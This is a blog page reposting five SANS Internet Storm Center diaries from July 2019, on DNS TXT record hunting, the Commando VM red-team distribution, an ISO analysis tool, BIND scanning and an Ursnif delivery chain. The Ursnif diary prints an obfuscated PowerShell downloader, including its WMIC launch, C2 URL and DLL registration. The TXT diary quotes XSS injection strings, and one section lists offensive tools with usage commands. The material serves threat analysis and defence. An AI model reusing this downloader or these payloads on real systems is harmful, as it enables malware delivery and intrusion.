Blog

Archive for July, 2019

Analyzis of DNS TXT Records, (Wed, Jul 17th)

At the Internet Storm Center, we already mentioned so many times that the domain name system is a goldmine for threat hunting or OSINT. A particular type of DNS record is the TXT record (or text record). It’s is a type of resource record used to provide the ability to associate free text with a host or other name. TXT records usually contain:

  • any free text related to the domain like contact information
  • technical data that can’t be stored in other records (SPF and DMARK records)
  • validation records
  • suspicious data (what did you expect?)
  • encoded packets or files (DNS tunnelling of exfiltration of data)

Keep in mind that TXT records are publicly available and should never contain sensitive data. They can be requested by any tool that interacts with DNS servers like dig:

$ dig sans.edu txt

; <> DiG 9.10.6 <> sans.edu txt
;; global options: +cmd
;; Got answer:
;; ->>HEADER<<- opcode: QUERY, status: NOERROR, id: 11178
;; flags: qr rd ra; QUERY: 1, ANSWER: 3, AUTHORITY: 4, ADDITIONAL: 1

;; OPT PSEUDOSECTION:
; EDNS: version: 0, flags:; udp: 4096
;; QUESTION SECTION:
;sans.edu.            IN    TXT

;; ANSWER SECTION:
sans.edu.        7200    IN    TXT    "MS=ms72131568"
sans.edu.        7200    IN    TXT    "v=spf1 mx ip4:72.55.140.81 ip4:66.35.59.0/24 ip4:66.35.60.0/24 ip4:204.51.94.0/24" " ip4:160.109.234.213 include:stspg-customer.com" " include:cust-spf.exacttarget.com include:spf.clearslide.com" " include:amazonses.com include:spf.protection.outlook.com include:_spf.salesforce.com ~all"
sans.edu.        7200    IN    TXT    "JI6UZuSsLXHEjD7PIBR1rWcPOqRkKRV2VwWAdhXZnLfbjhmfHHOwjMPizS78hfcgbTtjG1TaPTcdVqzgvUbyaw=="

;; AUTHORITY SECTION:
sans.edu.        171976    IN    NS    dns21a.sans.org.
sans.edu.        171976    IN    NS    dns21b.sans.org.
sans.edu.        171976    IN    NS    dns31b.sans.org.
sans.edu.        171976    IN    NS    dns31a.sans.org.

;; Query time: 131 msec
;; SERVER: 192.168.254.8#53(192.168.254.8)
;; WHEN: Tue Jul 16 14:18:20 CEST 2019
;; MSG SIZE  rcvd: 550

The RFC1464[1] discuss TXT records. They must contain printable characters so many TXT records contain Base64-encoded data (see the above example). But what can we find in TXT records? I extracted a long list of domain names from different DNS servers logs and malicious domains lists. Then I queried TXT records for each of them. Results have been loaded into a Splunk instance to search for some juicy stuff. What did I find?

Note: the set of collected domain names is directly related to the business/activity of the organizations’ log sources. I tried to mix different sources but they do not cover the full Internet.

Across 300K+ TXT records, 186K were related to SPF filters[2]. What are the top email providers?

  • Microsoft (Outlook.com) (9.9%)
  • Google (7.8%)
  • OVH (1.5%)

More than 3K domains have the following filter: “v=spf1 -all” which means basically “no hosts are authorized to send emails for those domains”.

Only 389(!) domains had a DKIM TXT record (“v=DKIM1; k=rsa; p=…”)

Another common usage of TXT records is to provide control to prove that you own a specific domain. That’s why many providers ask to create a validation record. The top-20 validation record types are:

google-site-verification 
facebook-domain-verification 
_globalsign-domain-verification 
adobe-idp-site-verification 
atlassian-domain-verification 
globalsign-domain-verification 
ciscocidomainverification 
status-page-domain-verification 
zoho-verification 
keybase-site-verification 
protonmail-verification 
have-i-been-pwned-verification 
dropbox-domain-verification 
workplace-domain-verification 
brave-ledger-verification 
webexdomainverification. 
citrix-verification-code 
adobe-sign-verification 
detectify-verification 
logmein-verification-code 
sophos-domain-verification

34K domains had an Office365 record “MS=msXXXXXXXX”

Domains using CloudFlare have a TXT record like “ca3-XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX” (5K+ records)

What about some suspicious/malicious activity?

I found 5 occurrences of:

window.location.replace("hxxp://www[.]28955bfg36abp[.]maintenirfa[.]icu/50968.html”);

Some SQL injection attempts:

';alert(String.fromCharCode(88,83,83))//';alert(String.fromCharCode(88,83,83))//""; alert(String.fromCharCode(88,83,83))//

Injections:

'"">>""> prompt(1)@gmail.com'-->"">alert(document.cookie)"">"" ""'"">

Finally, I had a look at Base64-encoded strings. I extracted all TXT record in a flat file and used Didier’s base64dump tool (only 16+ bytes data strings)

$ base64dump.py -n 16 txt-records.csv

18K strings have been decoded with mainly unknown data. If you restrict the min size of decoded data, you can find other types of records:

$ base64dump.py -n 128 1563290719_434556 | grep Salted__
433:     172 U2FsdGVkX18ImyXI Salted__.?%?'|j bf4a8022560a0eaa5410421803f3f36a
4836:     172 U2FsdGVkX18UR6BW Salted__.G?V?~?+ 1b6cb31ff37707a5234411b0d2946d92
5020:     128 U2FsdGVkX18LDhF1 Salted__...u??&{ be5a0c41bd9113f59d105fe52b0d600b
10480:     172 U2FsdGVkX18Gx+Qk Salted__.??$??.? 8f3c2fb8cb65bf83deb319040cfa0431
10858:     172 U2FsdGVkX19uUZCc Salted__nQ??E?Q? d1518d4dd745cf21549881477e1f0663
10859:     172 U2FsdGVkX18swQke Salted__,?..?.?j d59604b22066693a2fe1020a9230cee2
10860:     172 U2FsdGVkX18kqxHK Salted__$?.?? ? ad198d777d6535e735e011a1962da767
10863:     172 U2FsdGVkX182vS1/ Salted__6?-/.?? 79b98e60256204b1496672bf534d798f
11111:     192 U2FsdGVkX19gXMHT Salted__`??.R?* 9e3c2eb4248b8a9f19669b95733f6b42
11112:     172 U2FsdGVkX19eP/Xr Salted__^???+?? 62fec6ab31abf469714ed644f874dfe5
11989:     192 U2FsdGVkX19Lx8yU Salted__K??f?P9 bae75f0621aac882fe0d6437148eb6e2
12188:     172 U2FsdGVkX18fgi6U Salted__.?.??=?. d2f075147f0ecfd6dbd5decb5ab539a8
12189:     172 U2FsdGVkX1/bj0+w Salted__?O??J?- 57c4fab20a1d00ae6ab9421adb14db7d
12236:     128 U2FsdGVkX19eQQU7 Salted__^A.;?..? fe5ddee71702e557f2223b5dbf638521
12283:     172 U2FsdGVkX18oCMgi Salted__(.?"W??? 2340a1f6293d5094fbb1bfc7b0477ea9
12284:     172 U2FsdGVkX19TxBC7 Salted__S?.??Q7. 7023090b4b45d80468d73ccf1fd76f75
12292:     192 U2FsdGVkX19LqH/h Salted__K??h.?? f64d90db45cab9227c593fe99ee19ae6
12363:     152 U2FsdGVkX19AaKCa [email protected]??.U0/ a9f3b2548d3a5571b75510c392ceea70
12573:     172 U2FsdGVkX19vmD8m Salted__o??&??./ 94b8e7d4c933bd1fc6c3dd381fea9b95
15550:     128 U2FsdGVkX18YmIhE Salted__.??D?}?7 61421ac7e9463408085cf67ee525c2a0
15551:     152 U2FsdGVkX18N9H+R Salted__.?????o 0eda0cc8c4d2667032ce27d0a389f2a9
16629:     152 U2FsdGVkX194reUj Salted__x??#?J? c098589181b03e2a78f34ef3e08c7b09

The prefix “Salted__” means this either is the output of an “openssl enc” command or something like this.

As you can see, they are plenty of interesting data that can be found in TXT records. I also found an interesting blog article[3] with a set of regex to search for data in TXT records. You should keep in an eye on them.
I’m considering a permanent script to collect them on the fly from my Bro instance and build some kind of “passivetxt” service.

[1] https://www.rfc-editor.org/rfc/rfc1464.txt
[2] https://en.wikipedia.org/wiki/Sender_Policy_Framework
[3] https://www.tide-project.nl/blog/ccr2019/

Xavier Mertens (@xme)
Senior ISC Handler – Freelance Cyber Security Consultant
PGP Key

(c) SANS Internet Storm Center. https://isc.sans.edu Creative Commons Attribution-Noncommercial 3.0 United States License.

Reposted from SANS. View original.

Posted in: SANS

Leave a Comment (0) →

Commando VM: The Complete Mandiant Offensive VM, (Tue, Jul 16th)

Commando VM Logo

The good folks at Mandiant have created the Commando VM, a fully customized, Windows-based security distribution for penetration testing and red teaming.
From the project’s About Commando VM content:
“Penetration testers commonly use their own variants of Windows machines when assessing Active Directory environments. Commando VM was designed specifically to be the go-to platform for performing these internal penetration tests. The benefits of using a Windows machine include native support for Windows and Active Directory, using your VM as a staging area for C2 frameworks, browsing shares more easily (and interactively), and using tools such as PowerView and BloodHound without having to worry about placing output files on client assets.”

Many of the expected tools are available on this platform, over 140, including:

  • Nmap
  • Wireshark
  • Covenant
  • Python
  • Go
  • Remote Server Administration Tools
  • Sysinternals
  • Mimikatz
  • Burp-Suite
  • x64dbg
  • Hashcat

The team claims support for blue teams as well. In their own words, “Commando VM provides blue teams with the tools necessary to audit their networks and improve their detection capabilities. With a library of offensive tools, it makes it easy for blue teams to keep up with offensive tooling and attack trends.” While a bit more in spirit than reality with the Commando VM, any aspirations to support the purple team approach are welcome and admirable.

Installation is extremely straightforward, the platform is built out via Boxstarter, Chocolatey, and MyGet packages, and takes a bit of time to complete, more than an hour in multiple test scenarios for me. Full, thorough installation guidelines are here. The fast and furious version is simply this:

  • Create and configure a new Windows Virtual Machine, update it completely, then take a snapshot
  • Download and copy install.ps1 on the newly configured and updated VM
  • Open an elevated PowerShell console
  • Enable script execution: Set-ExecutionPolicy Unrestricted
  • Execute the installer script: .install.ps1

Be patient, let it finish, and keep an eye on the console from time to time as it progresses.
As always, please read the project content in full. You can also download the full Commando VM repository from GitHub as a zip package or clone it accordingly.

Given its Windows-centric focus, Commando VM includes a few tools that have advanced Windows exploitation practices, with particular attention to .NET and WMI.
In the reverse engineering category, there’s ILSpy, the open-source .NET assembly browser and decompiler.
For command and control, there’s Covenant, “a .NET command and control framework that aims to highlight the attack surface of .NET, make the use of offensive .NET tradecraft easier, and serve as a collaborative command and control platform for red teamers.”
From FortyNorth Security, also see WMImplant, “a PowerShell based tool that is designed to act like a RAT. Its interface is that of a shell where any command that is supported is translated into a WMI-equivalent for use on a network/remote machine.” FortyNorth Security and Chris Truncer also offer up WMIOps, “a powershell script which uses WMI for various purposes across a network.”
WMIOps is used to “perform a variety of actions on hosts, local or remote, within a Windows environment and is designed primarily for use on penetration tests or red team engagements.” As such, it includes:

  • Process functions: Get-RunningProcessesWMI (accounts with active processess)
  • User operations: Find-ActiveUsersWMI (whois on target)
  • Host enumeration: Get-ActiveNICSWMI (dump target NICs)
  • System manipulation operations: r Invoke-ServiceManipulation (service buggery)
  • File operations: Invoke-FileTransferOverWMI (exfil)

In the big bucket o’ exploitation tools, a few favorites lurk.
EvilClippy, as part of its role as a cross-platform assistant for creating malicious Microsoft Office documents, includes the likes of VBA stomping (P-code abuse). EvilClippy puts fake VBA code from a text file (VBA) in all modules, while leaving P-code intact, abusing an undocumented feature of module streams. It’s a straightforward as EvilClippy.exe -s fakecode.vba macrofile.doc

A wise and recent red team re-orientation towards C# opportunities is also well represented. FuzzySec’s Sharp-Suite, GhostPack, and SharpSploit are all present and accounted for. Commando VM owes a great debt to the hard work of the SpecterOps team. Ryan Cobb produced Covenant as well as SharpSploit.
Ryan states that there is a “trend developing on the offensive side of the security community in porting existing PowerShell toolsets to C#. With the added security features in PowerShell (ie. ScriptBlock Logging, AMSI, etc.), it makes sense that red teamers are investing in other options, and C# is the logical next step from PowerShell.” Note that SharpSploit is designed as a library, so there is only a SharpSploit.dll.
Ryan’s teammate, Will Schroeder aka harmj0y, created GhostPack, generically referred to as “collection of security related toolsets.” 😉
Therein, you will find the likes of Seatbelt, a “C# project that performs a number of security oriented host-survey safety checks relevant from both offensive and defensive security perspectives.”
Given the spirit of purple team embraced by the Commando VM team, Seatbelt seems like an ideal way to bring us to conclusion for this quick Commando VM overview. In order to make use of Seatbelt you need to compile it yourself, the project team is not releasing binaries.
To do so, simply download Visual Studio Community 2019 on your Commando VM, set it up for Windows development (.NET, desktop, and UWP), and then open Seatbelt.sln, found in C:toolsGhostPackSeatbelt. Be sure to run Visual Studio as administrator for this step. In Solution Explorer, right-click Seatbelt and select Build. You’ll then find Seatbelt.exe in C:toolsGhostPackSeatbeltSeatbeltbinDebug.
Pop a command shell, run Seatbelt.exe all and revel in the results, including the likes of system data (incoming RDP sessions, firewall rules, autoruns, etc), user data (saved RDP connections, 7 days of IE bookmarks and history, saved credential in Windows Vault, etc), and other collection options such as listing Kerberos tickets, Kerberos TGTData (ALL TEH TGTZ!), 4624 events from the security event log, and installed patches via WMI.

Seatbelt

Seatbelt

You can quickly see how Seatbelt can serve both red and blue causes.

Great stuff from the Mandiant team for Commando VM, a complete Mandiant offensive VM indeed. As alway, be cautious in your use, lots of chaos to be created with this platform, ensure you have permission and purview.

Cheers…until next time.

Russ McRee | @holisticinfosec

(c) SANS Internet Storm Center. https://isc.sans.edu Creative Commons Attribution-Noncommercial 3.0 United States License.

Reposted from SANS. View original.

Posted in: SANS

Leave a Comment (0) →

isodump.py and Malicious ISOFiles, (Mon, Jul 15th)

Inspired by my diary entry “Malicious .iso Attachments“, @Evild3ad79 created a tool, isodump.py, to help with the analysis of ISO files.

Without any arguments or options, the tool displays its usage:

When you just provide it an ISO file, it does nothing:

You have to provide a command, like displaying metadata (-M):

Or listing the content (-l):

This ISO file contains a file named PAYMENT.EXE, it’s very likely a PE file (starts with 4D5A, or MZ). With the provided hashes, we can search for it on VirusTotal.

The file can be selected (-s 0) and dumped to stdout (-d). I like this feature, it allows me to pipe the malware into another analysis tool, without writing it to disk:

If you just need to look at the first file, you can omit option -s:

 

Didier Stevens
Senior handler
Microsoft MVP
blog.DidierStevens.com DidierStevensLabs.com

(c) SANS Internet Storm Center. https://isc.sans.edu Creative Commons Attribution-Noncommercial 3.0 United States License.

Reposted from SANS. View original.

Posted in: SANS

Leave a Comment (0) →

Guidance to Protect DNS Against Hijacking & Scanning for Version.BIND Still a Thing, (Sat, Jul 13th)

This type of scanning looking for vulnerable BIND server is nothing new and has been ongoing for pretty much the past 20 years. Checking what might be exploitable, the last BIND advisory was released less than a month ago [1] and is remotely exploitable. This is an example of observable BIND Version scanning that could seen in DNS logs.


Coming back to DNS, yesterday the UK National Cyber Security Centre (NCSC) released an alert to provide guidance against “DNS hijacking and mitigation advice”[3] because of a continued ongoing large-scale campaign to hijack DNS servers. The original alert published in January 2019 is available here which highlighted that DNS A (Address) and NS (Name Server) records where the main target for hijacking.

If you have DNS servers within your environment, have a look at the document provided by NCSC available here.

[1] https://kb.isc.org/docs/cve-2019-6471
[2] https://kb.isc.org/docs/cve-2019-6469
[3] https://www.ncsc.gov.uk/news/ongoing-dns-hijacking-and-mitigation-advice
[4] https://www.ncsc.gov.uk/news/alert-dns-hijacking-activity
[5] https://s3.eu-west-1.amazonaws.com/ncsc-content/files/Advisory-DNS-hijacking.pdf

———–
Guy Bruneau IPSS Inc.
My Handler Page
Twitter: GuyBruneau
gbruneau at isc dot sans dot edu

(c) SANS Internet Storm Center. https://isc.sans.edu Creative Commons Attribution-Noncommercial 3.0 United States License.

Reposted from SANS. View original.

Posted in: SANS

Leave a Comment (0) →

Russian Dolls Malicious Script Delivering Ursnif, (Thu, Jul 11th)

As a result of my hunting jobs, I found an interesting piece of obfuscated script. This one looks really like Russian dolls because multiple levels of obfuscation are implemented. It is invoked via WMIC, the command client that performs Windows Management Instrumentation (WMI) operations from a command prompt. If WMI is known to be a management solution (to get status of local and remote Windows hosts), it is able to perform a lot of interesting stuff like changing settings, managing users and… spawn processes. Example:

C:UsersREM>wmic process call create calc.exe
Executing (Win32_Process)->Create()
Method execution successful.
Out Parameters:
instance of __PARAMETERS
{
        ProcessId = 5372;
        ReturnValue = 0;
};

The sample that I found spawns a Powershell process with an obfuscated payload (SHA256: ced09a35fd85240ec0066bac134c08cec8a9e39ecceed1ad52fade55f39e359e) and has a low VT score (2/55)[1]. Here is a beautified version:

WmiC "prOcess" "CAlL" "CrEATe" "PoWersheLl -NoPRofiLE -EXECUTiONpoLI bYpAss -wiN 000000000000000000000000000000000000000000000000000000000000000001 -nOninT . 
( $sHELlid[1]+$sHeLLiD[13]+'x')("".('sl');&('sa'+'l') ('Ll') ('sa'+'l');&('lp');.('Ll') ('Pp') ('N'+'Ew-ObJ'+'ect');&('Ll') ('Pp'+'p') ('i'+'EX');&('Pp'+'p')(&('Pp') ('SysteM.i'+'O.co'+'mPRES'+'siOn'+'.'+'defLA'+'tESTrE'+'A'+'m')([IO.mEmORYsTReam][conVert]::FROmBaSe64stRing( (‘



') ) "" + [StrinG][Char]44 +""[iO.CoMPressiOn.ComPreSSiONmODe]::DeCoMpreSS)|.('%') {.('Pp') ('SY'+'st'+'Em.Io.stRe'+'AmreAd'+'er')(`${_}"" + [StrinG][Char]44 +"" [TExT.eNCOdinG]::ASciI)} ).reADtoEnD()"" )"

The payload is Base64-encoded and compressed using the Deflate[2] algorythm. You can easily decode this first stage payload with a few lines of Powershell:

$base64data = ‘'
$data = [System.Convert]::FromBase64String($base64data)
$m = New-Object System.IO.MemoryStream
$m.Write($data, 0, $data.Length)
$m.Seek(0,0) | Out-Null
$s = New-Object System.IO.StreamReader(New-Object System.IO.Compression.DeflateStream($ms, [System.IO.Compression.CompressionMode]::Decompress))
echo $s.ReadLine()

The result gives us a second stage payload:

Ll Xf Get-Date;Ll Jq rundll32;[sTRING]::joIn( '' ,( ‘



'-SPLiT','-sPliT'G' -split'D'-SpLiT'%' -SpliT '<'-sPlit 'S' -split'p' -SpliT'~' -sPlIt'K' -SPl
iT':' |%{ ( [ConvERT]::toiNT16(( $_.TosTRiNG()) ,8)-as [CHaR])}) ) |Ppp

Here is the decoded payload:

$Tk=get-counter;( Pp  Io.STreaMreaDer(( Pp iO.cOMpReSSioN.DeFLATEstReAM( [SYsTeM.iO.MEMoRYsTReAM] [cOnvERt]::FrombAsE64stRinG
(‘



'),[IO.comPREsSioN.cOmPresSiOnmOdE]::dEcOMpress)), [Text.eNcoDiNG]::aSciI) ).reADTOEND( )|Ppp

Again, we are facing the same behaviour. The third payload is Base64-encoded and deflated. Once decoded, we now have this:

if((.('Xf')|.("{0}{2}{1}" -f'out-','ring','st')) -like ("{0}{1}"-f '*gn','*')){${I`i}=("{1}{4}{2}{3}{6}{7}{0}{5}"-f 'd/e.p','https','ndoluy','r','://fu','hp','.','fun');${i`I}="${ii}?"+(&('Xf') -Format ('o')).('sub'+'str'+'ing').Invoke(0,27);${Ez}=("{1}{2}{0}"-f 'ient','Net.WebC','l');function R`Sd([string] ${t`eE}){${L} = @{}; ${L}.';' = 'T'; ${L}.'_' = 'V'; ${l}.'-' = 'A'; Foreach(${E} in ${l}."Ke`Ys"){${T`ee} = ${T`ee}.('R'+'eplac'+'e').Invoke(${e}, ${l}.${e})}return ${T`EE}};.('SV') ("{1}{0}" -f'U','43') ${II}}else{exit};.('SV') ('4H') ${Ez};&("{0}{1}"-f 'di','r') ("{0}{1}" -f'ect','*');.('SV') ('wm') (&(.('GI') ("{4}{2}{0}{1}{3}" -f 'e:/','E*ont','abl','e*','Vari'))."v`ALUe".(((&('GI') ("{3}{2}{0}{1}"-f'*onte','*','iable:/E','Var'))."VAL`UE"|&("{0}{1}{2}"-f 'Me','m','ber'))[6]."NA`me").('GetCm'+'dle'+'t').Invoke((&('GI') ("{0}{1}{2}{4}{3}" -f'Var','iable',':/','e*','E*ont'))."v`ALUe".(((&('GI') ("{0}{3}{2}{1}"-f 'Varia','nte*','le:/E*o','b'))."v`ALuE"|.("{0}{1}" -f'Membe','r'))[6]."n`AME").(((.('GI') ("{0}{2}{3}{1}" -f 'Vari','/E*onte*','able',':'))."VaL`Ue".(((&('GI') ("{5}{1}{2}{4}{0}{3}"-f'*','riab','l','onte*','e:/E','Va'))."vA`LuE"|.("{0}{1}" -f 'Memb','er'))[6]."na`mE")."PS`oB`JECT"."MeT`hODS"|.('?'){(&("{1}{0}"-f 'R','DI') ((("{0}{1}{2}" -f'Variabl','e:K4q','_'))-replACE  'K4q',[chAr]92))."VA`lue"."nA`mE"-like("{0}{1}" -f '*n','d*e')})."N`AMe")."iN`V`okE"(("{0}{1}"-f 'N*','ct'),1,${T`Rue}))(&("{2}{1}{0}"-f'able','ri','Va') ('4H'))."V`ALUe");&('SV') ('Gu') ((((.("{0}{1}" -f 'GC','i') ("{0}{2}{3}{1}" -f 'Variab','wm','l','e:'))."va`LUe"|&("{1}{0}{2}" -f'm','Me','ber'))|&('?'){(.("{1}{0}" -f'IR','D') ((("{1}{0}" -f'0}_','Variable:{'))  -f[ChaR]92))."val`Ue"."Na`me"-like("{1}{0}"-f'wn*g','*')})."nA`mE");${L`y}=(&("{1}{0}"-f'i','gC') ("{1}{0}{2}"-f'able','Vari',':wm'))."vAL`Ue".((.("{1}{0}" -f 'Ci','G') ((("{0}{2}{1}{3}" -f 'V','e:{0}G','ariabl','u'))  -f [cHAr]92))."vaL`Ue")."IN`VOKe"((.("{0}{1}"-f 'G','CI') ("{2}{1}{0}" -f'e:/43U','riabl','Va'))."Val`UE");if((${tK}|.('FL') -Property ('*')|.("{2}{1}{0}" -f'-String','t','Ou')) -Match ("{0}{1}" -f'i','sco f')){${G`A}=${En`V`:temp};${gg}=(${D} = .("{0}{1}"-f'g','ci') ${G`A}|&("{0}{2}{1}" -f 'g','ndom','et-ra'))."N`AME" -replace ".{4}$";${WY}=${g`A}+''+${gg}+'.';("{1}{0}{2}" -f'r','er','or[0]')|.("{0}{1}{2}" -f 'se','t-clipboa','rd');[io.file]::"w`Ri`T`eallBYTes"(${w`y},[Convert]::('F'+'rom'+'Ba'+'se64S'+'tring').Invoke((&("{0}{1}"-f 'Rs','d')(${ly})).('replac'+'e').Invoke(' ','')))};if((&("{1}{0}" -f'i','gc') ${w`Y})."LE`N`GTH" -lt 200){exit};&("{0}{1}" -f's','leep') 9;.('Jq') ("{2}{1}{0}{3}"-f'p','l.c','InetCp','l'),("{1}{5}{0}{4}{3}{6}{2}"-f 'arMy','Cl','s','ksB','Trac','e','yProces') 8|.('Jq') ('/s') ${wy}, ("{1}{0}{2}{3}{4}"-f 'egi','DllR','ster','Ser','ver');.("{1}{0}"-f'leep','s') 55;&('sl');[io.file]::"w`RItEAL`lLIN`ES"(${w`y},[regex]::('repl'+'ace').Invoke(${ly},'d','.’))

This script is also nicely obfuscated but it’s easy to spot the goal: it’s the downloader. Many strings are stored in arrays but they are easy to read:

PS C:UsersREM> ${I`i}=("{1}{4}{2}{3}{6}{7}{0}{5}"-f 'd/e.p','https','ndoluy','r','://fu','hp','.','fun');
PS C:UsersREM> echo ${I`i}
hxxps://fundoluyr[.]fund/e.php

Too bad the domain does not resolve anymore but it can be found in passive DNS databases. It was resolving to 185[.]158[.]251[.]97. Let’s try to access the site now:

isc> curl --resolve fundoluyr[.]fund:443:185[.]158[.]251[.]97 -v hxxps://fundoluyr[.]fund/e.php
* Added fundoluyr[.]fund:443:185[.]158[.]251[.]97 to DNS cache
* Hostname fundoluyr.fund was found in DNS cache
*   Trying 185[]158[.]251[.]97...
* TCP_NODELAY set
* Connection failed
* connect to 185[.]158[.]251[.]97 port 443 failed: Connection refused
* Failed to connect to fundoluyr[.]fund port 443: Connection refused
* Closing connection 0
curl: (7) Failed to connect to fundoluyr[.]fund port 443: Connection refused

The server is also down but I found references to the URL on Twitter. A malware analyst (@reecDeep) grabbed the file server by the URL and found a DLL:

It’s an Ursnif sample (SHA256:3e0c302ffaaf26cca166dad8691f3cc8a4f2c3800311ef856a47ecac02854a41)[3].

Another nice example of obfuscation isn’t it?

[1] https://www.virustotal.com/gui/file/ced09a35fd85240ec0066bac134c08cec8a9e39ecceed1ad52fade55f39e359e/detection
[2] https://en.wikipedia.org/wiki/DEFLATE
[3] https://beta.virusbay.io/sample/browse/01529543151d3d9f0537009827484735

Xavier Mertens (@xme)
Senior ISC Handler – Freelance Cyber Security Consultant
PGP Key

(c) SANS Internet Storm Center. https://isc.sans.edu Creative Commons Attribution-Noncommercial 3.0 United States License.

Reposted from SANS. View original.

Posted in: SANS

Leave a Comment (0) →
Page 4 of 7 «...23456...»